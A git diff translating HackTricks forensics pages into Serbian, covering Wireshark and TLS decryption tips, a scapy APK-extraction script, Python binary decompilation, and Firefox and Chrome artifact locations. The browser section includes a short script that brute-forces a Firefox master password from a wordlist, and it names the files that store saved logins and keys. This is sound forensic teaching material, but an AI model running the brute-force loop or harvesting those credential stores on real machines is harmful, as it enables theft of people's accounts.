@@ -1,157 +1,155 @@ -# Wireshark tricks +# Wireshark trikovi {{#include ../../../banners/hacktricks-training.md}} -## Improve your Wireshark skills +## Poboljšajte svoje veštine u Wireshark-u -### Tutorials +### Tutorijali -The following tutorials are amazing to learn some cool basic tricks: +Sledeći tutorijali su sjajni za učenje nekih cool osnovnih trikova: - [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/) - [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/) - [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/) - [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/) -### Analysed Information +### Analizirane informacije -**Expert Information** +**Stručne informacije** -Clicking on _**Analyze** --> **Expert Information**_ you will have an **overview** of what is happening in the packets **analyzed**: +Klikom na _**Analiziraj** --> **Stručne informacije**_ dobićete **pregled** onoga što se dešava u **analiziranim** paketima: ![](<../../../images/image (256).png>) -**Resolved Addresses** +**Rešene adrese** -Under _**Statistics --> Resolved Addresses**_ you can find several **information** that was "**resolved**" by wireshark like port/transport to protocol, MAC to the manufacturer, etc. It is interesting to know what is implicated in the communication. +Pod _**Statistika --> Rešene adrese**_ možete pronaći nekoliko **informacija** koje je wireshark "**rešio**", kao što su port/transport do protokola, MAC do proizvođača itd. Zanimljivo je znati šta je uključeno u komunikaciju. 
![](<../../../images/image (893).png>) -**Protocol Hierarchy** +**Hijerarhija protokola** -Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **involved** in the communication and data about them. +Pod _**Statistika --> Hijerarhija protokola**_ možete pronaći **protokole** **uključene** u komunikaciju i podatke o njima. ![](<../../../images/image (586).png>) -**Conversations** +**Razgovori** -Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them. +Pod _**Statistika --> Razgovori**_ možete pronaći **rezime razgovora** u komunikaciji i podatke o njima. ![](<../../../images/image (453).png>) -**Endpoints** +**Krajnje tačke** -Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them. +Pod _**Statistika --> Krajnje tačke**_ možete pronaći **rezime krajnjih tačaka** u komunikaciji i podatke o svakoj od njih. ![](<../../../images/image (896).png>) -**DNS info** +**DNS informacije** -Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured. +Pod _**Statistika --> DNS**_ možete pronaći statistiku o uhvaćenim DNS zahtevima. 
![](<../../../images/image (1063).png>) -**I/O Graph** +**I/O graf** -Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.** +Pod _**Statistika --> I/O graf**_ možete pronaći **graf komunikacije.** ![](<../../../images/image (992).png>) -### Filters +### Filteri -Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ -Other interesting filters: +Ovde možete pronaći wireshark filtere u zavisnosti od protokola: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ +Ostali zanimljivi filteri: - `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` - - HTTP and initial HTTPS traffic +- HTTP i inicijalni HTTPS saobraćaj - `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)` - - HTTP and initial HTTPS traffic + TCP SYN +- HTTP i inicijalni HTTPS saobraćaj + TCP SYN - `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)` - - HTTP and initial HTTPS traffic + TCP SYN + DNS requests +- HTTP i inicijalni HTTPS saobraćaj + TCP SYN + DNS zahtevi -### Search +### Pretraga -If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_. You can add new layers to the main information bar (No., Time, Source, etc.) by pressing the right button and then the edit column. +Ako želite da **pretražujete** **sadržaj** unutar **paketa** sesija pritisnite _CTRL+f_. Možete dodati nove slojeve u glavnu informativnu traku (Br., Vreme, Izvor itd.) pritiskom desnog dugmeta i zatim uređivanjem kolone. 
-### Free pcap labs +### Besplatni pcap laboratoriji -**Practice with the free challenges of:** [**https://www.malware-traffic-analysis.net/**](https://www.malware-traffic-analysis.net) +**Vežbajte sa besplatnim izazovima:** [**https://www.malware-traffic-analysis.net/**](https://www.malware-traffic-analysis.net) -## Identifying Domains +## Identifikacija domena -You can add a column that shows the Host HTTP header: +Možete dodati kolonu koja prikazuje Host HTTP zaglavlje: ![](<../../../images/image (639).png>) -And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**): +I kolonu koja dodaje ime servera iz inicijalne HTTPS veze (**ssl.handshake.type == 1**): ![](<../../../images/image (408) (1).png>) -## Identifying local hostnames +## Identifikacija lokalnih imena hostova -### From DHCP +### Iz DHCP -In current Wireshark instead of `bootp` you need to search for `DHCP` +U trenutnom Wireshark-u umesto `bootp` treba da tražite `DHCP` ![](<../../../images/image (1013).png>) -### From NBNS +### Iz NBNS ![](<../../../images/image (1003).png>) -## Decrypting TLS +## Dekriptovanje TLS -### Decrypting https traffic with server private key +### Dekriptovanje https saobraćaja sa privatnim ključem servera _edit>preference>protocol>ssl>_ ![](<../../../images/image (1103).png>) -Press _Edit_ and add all the data of the server and the private key (_IP, Port, Protocol, Key file and password_) +Pritisnite _Edit_ i dodajte sve podatke o serveru i privatnom ključu (_IP, Port, Protokol, Datoteka ključa i lozinka_) -### Decrypting https traffic with symmetric session keys +### Dekriptovanje https saobraćaja sa simetričnim sesijskim ključevima -Both Firefox and Chrome have the capability to log TLS session keys, which can be used with Wireshark to decrypt TLS traffic. This allows for in-depth analysis of secure communications. 
More details on how to perform this decryption can be found in a guide at [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/). +I Firefox i Chrome imaju mogućnost da beleže TLS sesijske ključeve, koji se mogu koristiti sa Wireshark-om za dekriptovanje TLS saobraćaja. Ovo omogućava dubinsku analizu sigurnih komunikacija. Više detalja o tome kako izvršiti ovo dekriptovanje može se naći u vodiču na [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/). -To detect this search inside the environment for to variable `SSLKEYLOGFILE` +Da biste to otkrili, pretražujte unutar okruženja za promenljivu `SSLKEYLOGFILE` -A file of shared keys will look like this: +Datoteka deljenih ključeva će izgledati ovako: ![](<../../../images/image (820).png>) -To import this in wireshark go to \_edit > preference > protocol > ssl > and import it in (Pre)-Master-Secret log filename: +Da biste to uvezli u wireshark idite na \_edit > preference > protocol > ssl > i uvezite to u (Pre)-Master-Secret log filename: ![](<../../../images/image (989).png>) -## ADB communication - -Extract an APK from an ADB communication where the APK was sent: +## ADB komunikacija +Izvucite APK iz ADB komunikacije gde je APK poslat: ```python from scapy.all import * pcap = rdpcap("final2.pcapng") def rm_data(data): - splitted = data.split(b"DATA") - if len(splitted) == 1: - return data - else: - return splitted[0]+splitted[1][4:] +splitted = data.split(b"DATA") +if len(splitted) == 1: +return data +else: +return splitted[0]+splitted[1][4:] all_bytes = b"" for pkt in pcap: - if Raw in pkt: - a = pkt[Raw] - if b"WRTE" == bytes(a)[:4]: - all_bytes += rm_data(bytes(a)[24:]) - else: - all_bytes += rm_data(bytes(a)) +if Raw in pkt: +a = pkt[Raw] +if b"WRTE" == bytes(a)[:4]: +all_bytes += rm_data(bytes(a)[24:]) +else: +all_bytes += rm_data(bytes(a)) print(all_bytes) f = open('all_bytes.data', 'w+b') f.write(all_bytes) f.close() ``` - {{#include 
../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index ec397e99a..63c3c697b 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md @@ -1,77 +1,61 @@ -# Decompile compiled python binaries (exe, elf) - Retreive from .pyc +# Decompilacija kompajliranih python binarnih fajlova (exe, elf) - Preuzimanje iz .pyc {{#include ../../../banners/hacktricks-training.md}} -
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} - -## From Compiled Binary to .pyc - -From an **ELF** compiled binary you can **get the .pyc** with: +## Od kompajliranog binarnog fajla do .pyc +Iz **ELF** kompajliranog binarnog fajla možete **dobiti .pyc** sa: ```bash pyi-archive_viewer # The list of python modules will be given here: [(0, 230, 311, 1, 'm', 'struct'), - (230, 1061, 1792, 1, 'm', 'pyimod01_os_path'), - (1291, 4071, 8907, 1, 'm', 'pyimod02_archive'), - (5362, 5609, 13152, 1, 'm', 'pyimod03_importers'), - (10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'), - (12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'), - (13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'), - (13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'), - (15090, 445, 672, 1, 's', 'pyi_rth_inspect'), - (15535, 2514, 4421, 1, 's', 'binary_name'), +(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'), +(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'), +(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'), +(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'), +(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'), +(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'), +(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'), +(15090, 445, 672, 1, 's', 'pyi_rth_inspect'), +(15535, 2514, 4421, 1, 's', 'binary_name'), ... ? X binary_name to filename? 
/tmp/binary.pyc ``` - -In a **python exe binary** compiled you can **get the .pyc** by running: - +U **python exe binarnom** kompajliranom možete **dobiti .pyc** pokretanjem: ```bash python pyinstxtractor.py executable.exe ``` +## Od .pyc do python koda -## From .pyc to python code - -For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**: - +Za **.pyc** podatke ("kompilirani" python) trebali biste početi da pokušavate da **izvučete** **originalni** **python** **kod**: ```bash uncompyle6 binary.pyc > decompiled.py ``` +**Uverite se** da binarni fajl ima **ekstenziju** "**.pyc**" (ako ne, uncompyle6 neće raditi) -**Be sure** that the binary has the **extension** "**.pyc**" (if not, uncompyle6 is not going to work) - -While executing **uncompyle6** you might find the **following errors**: - -### Error: Unknown magic number 227 +Tokom izvršavanja **uncompyle6** mogli biste naići na **sledeće greške**: +### Greška: Nepoznat magični broj 227 ```bash /kali/.local/bin/uncompyle6 /tmp/binary.pyc Unknown magic number 227 in /tmp/binary.pyc ``` +Da biste to popravili, potrebno je da **dodate ispravan magični broj** na početku generisanog fajla. -To fix this you need to **add the correct magic number** at the beginning of the generated file. 
- -**Magic numbers vary with the python version**, to get the magic number of **python 3.8** you will need to **open a python 3.8** terminal and execute: - +**Magični brojevi se razlikuju u zavisnosti od verzije pythona**, da biste dobili magični broj za **python 3.8**, potrebno je da **otvorite python 3.8** terminal i izvršite: ``` >> import imp >> imp.get_magic().hex() '550d0d0a' ``` +**Magični broj** u ovom slučaju za python3.8 je **`0x550d0d0a`**, zatim, da biste ispravili ovu grešku, moraćete da **dodate** na **početak** **.pyc datoteke** sledeće bajtove: `0x0d550a0d000000000000000000000000` -The **magic number** in this case for python3.8 is **`0x550d0d0a`**, then, to fix this error you will need to **add** at the **beginning** of the **.pyc file** the following bytes: `0x0d550a0d000000000000000000000000` - -**Once** you have **added** that magic header, the **error should be fixed.** - -This is how a correctly added **.pyc python3.8 magic header** will look like: +**Jednom** kada ste **dodali** taj magični zaglavlje, **greška bi trebala biti ispravljena.** +Ovako će izgledati ispravno dodato **.pyc python3.8 magično zaglavlje**: ```bash hexdump 'binary.pyc' | head 0000000 0d55 0a0d 0000 0000 0000 0000 0000 0000 
@@ -79,25 +63,23 @@ hexdump 'binary.pyc' | head 0000020 0700 0000 4000 0000 7300 0132 0000 0064 0000030 0164 006c 005a 0064 0164 016c 015a 0064 ``` +### Greška: Decompiling generic errors -### Error: Decompiling generic errors +**Druge greške** kao što su: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` mogu se pojaviti. -**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` may appear. +To verovatno znači da **niste ispravno dodali** magični broj ili da niste **koristili** **ispravan magični broj**, pa se **pobrinite da koristite ispravan** (ili pokušajte novi). -This probably means that you **haven't added correctly** the magic number or that you haven't **used** the **correct magic number**, so make **sure you use the correct one** (or try a new one). +Proverite dokumentaciju o prethodnim greškama. -Check the previous error documentation. +## Automatski alat -## Automatic Tool +[**python-exe-unpacker alat**](https://github.com/countercept/python-exe-unpacker) služi kao kombinacija nekoliko alata dostupnih u zajednici, dizajniranih da pomognu istraživačima u raspakivanju i decompiling izvršnih datoteka napisanih u Pythonu, posebno onih kreiranih sa py2exe i pyinstaller. Uključuje YARA pravila za identifikaciju da li je izvršna datoteka zasnovana na Pythonu i potvrđuje alat za kreiranje. -The [**python-exe-unpacker tool**](https://github.com/countercept/python-exe-unpacker) serves as a combination of several community-available tools designed to assist researchers in unpacking and decompiling executables written in Python, specifically those created with py2exe and pyinstaller. It includes YARA rules to identify if an executable is Python-based and confirms the creation tool. 
+### ImportError: Ime datoteke: 'unpacked/malware_3.exe/**pycache**/archive.cpython-35.pyc' ne postoji -### ImportError: File name: 'unpacked/malware_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist - -A common issue encountered involves an incomplete Python bytecode file resulting from the **unpacking process with unpy2exe or pyinstxtractor**, which then **fails to be recognized by uncompyle6 due to a missing Python bytecode version number**. To address this, a prepend option has been added, which appends the necessary Python bytecode version number, facilitating the decompiling process. - -Example of the issue: +Uobičajen problem koji se javlja uključuje nepotpunu Python bytecode datoteku koja je rezultat **procesa raspakivanja sa unpy2exe ili pyinstxtractor**, koja zatim **ne može biti prepoznata od strane uncompyle6 zbog nedostatka broja verzije Python bytecode-a**. Da bi se to rešilo, dodata je opcija za preklapanje, koja dodaje neophodan broj verzije Python bytecode-a, olakšavajući proces decompiling-a. +Primer problema: ```python # Error when attempting to decompile without the prepend option test@test: uncompyle6 unpacked/malware_3.exe/archive.py 
@@ -115,11 +97,9 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive # Successfully decompiled file [+] Successfully decompiled. ``` +## Analiza python asemblera -## Analyzing python assembly - -If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **disassemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2: - +Ako niste mogli da izvučete "originalni" python kod prateći prethodne korake, možete pokušati da **izvučete** **asembler** (ali **nije baš opisno**, pa **pokušajte** ponovo da izvučete originalni kod). U [ovde](https://bits.theorem.co/protecting-a-python-codebase/) sam pronašao vrlo jednostavan kod za **dezintegraciju** _.pyc_ binarnog fajla (srećno sa razumevanjem toka koda). Ako je _.pyc_ iz python2, koristite python2: ```bash >>> import dis >>> import marshal 
@@ -145,34 +125,32 @@ True >>> >>> # Disassemble the code object >>> dis.disassemble(code) - 1 0 LOAD_CONST 0 () - 3 MAKE_FUNCTION 0 - 6 STORE_NAME 0 (hello_world) - 9 LOAD_CONST 1 (None) - 12 RETURN_VALUE +1 0 LOAD_CONST 0 () +3 MAKE_FUNCTION 0 +6 STORE_NAME 0 (hello_world) +9 LOAD_CONST 1 (None) +12 RETURN_VALUE >>> >>> # Also disassemble that const being loaded (our function) >>> dis.disassemble(code.co_consts[0]) - 2 0 LOAD_CONST 1 ('Hello {0}') - 3 LOAD_ATTR 0 (format) - 6 LOAD_FAST 0 (name) - 9 CALL_FUNCTION 1 - 12 PRINT_ITEM - 13 PRINT_NEWLINE - 14 LOAD_CONST 0 (None) - 17 RETURN_VALUE +2 0 LOAD_CONST 1 ('Hello {0}') +3 LOAD_ATTR 0 (format) +6 LOAD_FAST 0 (name) +9 CALL_FUNCTION 1 +12 PRINT_ITEM +13 PRINT_NEWLINE +14 LOAD_CONST 0 (None) +17 RETURN_VALUE ``` +## Python u izvršni fajl -## Python to Executable +Da počnemo, pokažaćemo vam kako se payloadi mogu kompajlirati u py2exe i PyInstaller. -To start, we’re going to show you how payloads can be compiled in py2exe and PyInstaller. - -### To create a payload using py2exe: - -1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org) -2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option “bundle_files” with the value of 1 will bundle everything including the Python interpreter into one exe. -3. Once the script is ready, we will issue the command “python setup.py py2exe”. This will create the executable, just like in Figure 2. +### Da kreirate payload koristeći py2exe: +1. Instalirajte py2exe paket sa [http://www.py2exe.org/](http://www.py2exe.org) +2. Za payload (u ovom slučaju, nazvaćemo ga hello.py), koristite skriptu kao što je prikazano na Slici 1. Opcija “bundle_files” sa vrednošću 1 će sve spojiti, uključujući Python interpreter, u jedan exe. +3. Kada je skripta spremna, izdaćemo komandu “python setup.py py2exe”. Ovo će kreirati izvršni fajl, baš kao na Slici 2. 
```python from distutils.core import setup import py2exe, sys, os @@ -180,10 +158,10 @@ import py2exe, sys, os sys.argv.append('py2exe') setup( - options = {'py2exe': {'bundle_files': 1}}, - #windows = [{'script': "hello.py"}], - console = [{'script': "hello.py"}], - zipfile = None, +options = {'py2exe': {'bundle_files': 1}}, +#windows = [{'script': "hello.py"}], +console = [{'script': "hello.py"}], +zipfile = None, ) ``` @@ -200,12 +178,10 @@ running py2exe copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe ``` +### Da biste kreirali payload koristeći PyInstaller: -### To create a payload using PyInstaller: - -1. Install PyInstaller using pip (pip install pyinstaller). -2. After that, we will issue the command “pyinstaller –onefile hello.py” (a reminder that ‘hello.py’ is our payload). This will bundle everything into one executable. - +1. Instalirajte PyInstaller koristeći pip (pip install pyinstaller). +2. Nakon toga, izdaćemo komandu “pyinstaller –onefile hello.py” (podsećanje da je ‘hello.py’ naš payload). Ovo će sve spojiti u jedan izvršni fajl. ``` C:\Users\test\Desktop\test>pyinstaller --onefile hello.py 108 INFO: PyInstaller: 3.3.1 @@ -218,15 +194,9 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py 5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe 6325 INFO: Building EXE from out00-EXE.toc completed successfully. ``` - -## References +## Reference - [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/) -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 76fa3ef23..df3900540 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,6 +1,6 @@ {{#include ../../../banners/hacktricks-training.md}} -Here you can find interesting tricks for specific file-types and/or software: +Ovde možete pronaći zanimljive trikove za specifične tipove fajlova i/ili softver: {{#ref}} .pyc.md diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index 104a7530f..7db647e6b 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -2,138 +2,128 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %} - ## Browsers Artifacts -Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types. +Browser artifacts uključuju različite vrste podataka koje čuvaju web pregledači, kao što su istorija navigacije, obeleživači i podaci iz keša. Ovi artefakti se čuvaju u specifičnim fasciklama unutar operativnog sistema, razlikujući se po lokaciji i imenu među pregledačima, ali generalno čuvaju slične tipove podataka. -Here's a summary of the most common browser artifacts: +Evo sažetak najčešćih browser artefakata: -- **Navigation History**: Tracks user visits to websites, useful for identifying visits to malicious sites. -- **Autocomplete Data**: Suggestions based on frequent searches, offering insights when combined with navigation history. -- **Bookmarks**: Sites saved by the user for quick access. -- **Extensions and Add-ons**: Browser extensions or add-ons installed by the user. -- **Cache**: Stores web content (e.g., images, JavaScript files) to improve website loading times, valuable for forensic analysis. -- **Logins**: Stored login credentials. -- **Favicons**: Icons associated with websites, appearing in tabs and bookmarks, useful for additional information on user visits. -- **Browser Sessions**: Data related to open browser sessions. -- **Downloads**: Records of files downloaded through the browser. 
-- **Form Data**: Information entered in web forms, saved for future autofill suggestions. -- **Thumbnails**: Preview images of websites. -- **Custom Dictionary.txt**: Words added by the user to the browser's dictionary. +- **Istorija navigacije**: Prati posete korisnika veb sajtovima, korisno za identifikaciju poseta zlonamernim sajtovima. +- **Podaci za automatsko popunjavanje**: Predlozi zasnovani na čestim pretragama, nude uvid kada se kombinuju sa istorijom navigacije. +- **Obeleživači**: Sajtovi koje je korisnik sačuvao za brzi pristup. +- **Ekstenzije i dodaci**: Ekstenzije pregledača ili dodaci koje je instalirao korisnik. +- **Keš**: Čuva veb sadržaj (npr. slike, JavaScript datoteke) kako bi poboljšao vreme učitavanja veb sajtova, vredno za forenzičku analizu. +- **Prijave**: Sačuvane prijavne informacije. +- **Favikoni**: Ikone povezane sa veb sajtovima, pojavljuju se u karticama i obeleživačima, korisne za dodatne informacije o posetama korisnika. +- **Sesije pregledača**: Podaci vezani za otvorene sesije pregledača. +- **Preuzimanja**: Zapisnici datoteka preuzetih putem pregledača. +- **Podaci iz obrazaca**: Informacije unesene u veb obrasce, sačuvane za buduće predloge automatskog popunjavanja. +- **Sličice**: Pregledne slike veb sajtova. +- **Custom Dictionary.txt**: Reči koje je korisnik dodao rečniku pregledača. ## Firefox -Firefox organizes user data within profiles, stored in specific locations based on the operating system: +Firefox organizuje korisničke podatke unutar profila, koji se čuvaju na specifičnim lokacijama u zavisnosti od operativnog sistema: - **Linux**: `~/.mozilla/firefox/` - **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/` - **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\` -A `profiles.ini` file within these directories lists the user profiles. 
Each profile's data is stored in a folder named in the `Path` variable within `profiles.ini`, located in the same directory as `profiles.ini` itself. If a profile's folder is missing, it may have been deleted. +Datoteka `profiles.ini` unutar ovih direktorijuma sadrži listu korisničkih profila. Podaci svakog profila se čuvaju u fascikli nazvanoj u `Path` varijabli unutar `profiles.ini`, koja se nalazi u istom direktorijumu kao i `profiles.ini`. Ako nedostaje fascikla profila, možda je obrisana. -Within each profile folder, you can find several important files: +Unutar svake fascikle profila možete pronaći nekoliko važnih datoteka: -- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data. - - Use specific SQL queries to extract history and downloads information. -- **bookmarkbackups**: Contains backups of bookmarks. -- **formhistory.sqlite**: Stores web form data. -- **handlers.json**: Manages protocol handlers. -- **persdict.dat**: Custom dictionary words. -- **addons.json** and **extensions.sqlite**: Information on installed add-ons and extensions. -- **cookies.sqlite**: Cookie storage, with [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) available for inspection on Windows. -- **cache2/entries** or **startupCache**: Cache data, accessible through tools like [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html). -- **favicons.sqlite**: Stores favicons. -- **prefs.js**: User settings and preferences. -- **downloads.sqlite**: Older downloads database, now integrated into places.sqlite. -- **thumbnails**: Website thumbnails. -- **logins.json**: Encrypted login information. -- **key4.db** or **key3.db**: Stores encryption keys for securing sensitive information. +- **places.sqlite**: Čuva istoriju, obeleživače i preuzimanja. 
Alati poput [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) na Windows-u mogu pristupiti podacima o istoriji. +- Koristite specifične SQL upite za ekstrakciju informacija o istoriji i preuzimanjima. +- **bookmarkbackups**: Sadrži rezervne kopije obeleživača. +- **formhistory.sqlite**: Čuva podatke iz veb obrazaca. +- **handlers.json**: Upravljanje protokolima. +- **persdict.dat**: Reči iz prilagođenog rečnika. +- **addons.json** i **extensions.sqlite**: Informacije o instaliranim dodacima i ekstenzijama. +- **cookies.sqlite**: Skladištenje kolačića, uz [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) dostupan za inspekciju na Windows-u. +- **cache2/entries** ili **startupCache**: Podaci iz keša, dostupni putem alata kao što je [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html). +- **favicons.sqlite**: Čuva favikone. +- **prefs.js**: Korisničke postavke i preferencije. +- **downloads.sqlite**: Starija baza podataka preuzimanja, sada integrisana u places.sqlite. +- **thumbnails**: Sličice veb sajtova. +- **logins.json**: Enkriptovane prijavne informacije. +- **key4.db** ili **key3.db**: Čuva ključeve za enkripciju radi zaštite osetljivih informacija. -Additionally, checking the browser’s anti-phishing settings can be done by searching for `browser.safebrowsing` entries in `prefs.js`, indicating whether safe browsing features are enabled or disabled. - -To try to decrypt the master password, you can use [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\ -With the following script and call you can specify a password file to brute force: +Pored toga, proveru podešavanja pregledača za zaštitu od phishing-a možete izvršiti pretraživanjem `browser.safebrowsing` unosa u `prefs.js`, što ukazuje na to da li su funkcije sigurne navigacije omogućene ili onemogućene. 
+Da biste pokušali da dekriptujete glavnu lozinku, možete koristiti [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\ +Sa sledećim skriptom i pozivom možete odrediti datoteku lozinki za brute force: ```bash:brute.sh #!/bin/bash #./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:" passfile=$1 while read pass; do - echo "Trying $pass" - echo "$pass" | python firefox_decrypt.py +echo "Trying $pass" +echo "$pass" | python firefox_decrypt.py done < $passfile ``` - ![](<../../../images/image (692).png>) ## Google Chrome -Google Chrome stores user profiles in specific locations based on the operating system: +Google Chrome čuva korisničke profile na specifičnim lokacijama u zavisnosti od operativnog sistema: - **Linux**: `~/.config/google-chrome/` - **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\` - **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/` -Within these directories, most user data can be found in the **Default/** or **ChromeDefaultData/** folders. The following files hold significant data: +Unutar ovih direktorijuma, većina korisničkih podataka može se naći u **Default/** ili **ChromeDefaultData/** folderima. Sledeće datoteke sadrže značajne podatke: -- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads. -- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available. -- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html). -- **Bookmarks**: User bookmarks. -- **Web Data**: Contains form history. -- **Favicons**: Stores website favicons. 
-- **Login Data**: Includes login credentials like usernames and passwords. -- **Current Session**/**Current Tabs**: Data about the current browsing session and open tabs. -- **Last Session**/**Last Tabs**: Information about the sites active during the last session before Chrome was closed. -- **Extensions**: Directories for browser extensions and addons. -- **Thumbnails**: Stores website thumbnails. -- **Preferences**: A file rich in information, including settings for plugins, extensions, pop-ups, notifications, and more. -- **Browser’s built-in anti-phishing**: To check if anti-phishing and malware protection are enabled, run `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Look for `{"enabled: true,"}` in the output. +- **History**: Sadrži URL-ove, preuzimanja i ključne reči za pretragu. Na Windows-u, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) može se koristiti za čitanje istorije. Kolona "Transition Type" ima različita značenja, uključujući klikove korisnika na linkove, otkucane URL-ove, slanje obrazaca i ponovna učitavanja stranica. +- **Cookies**: Čuva kolačiće. Za inspekciju, dostupna je [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html). +- **Cache**: Drži keširane podatke. Za inspekciju, korisnici Windows-a mogu koristiti [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html). 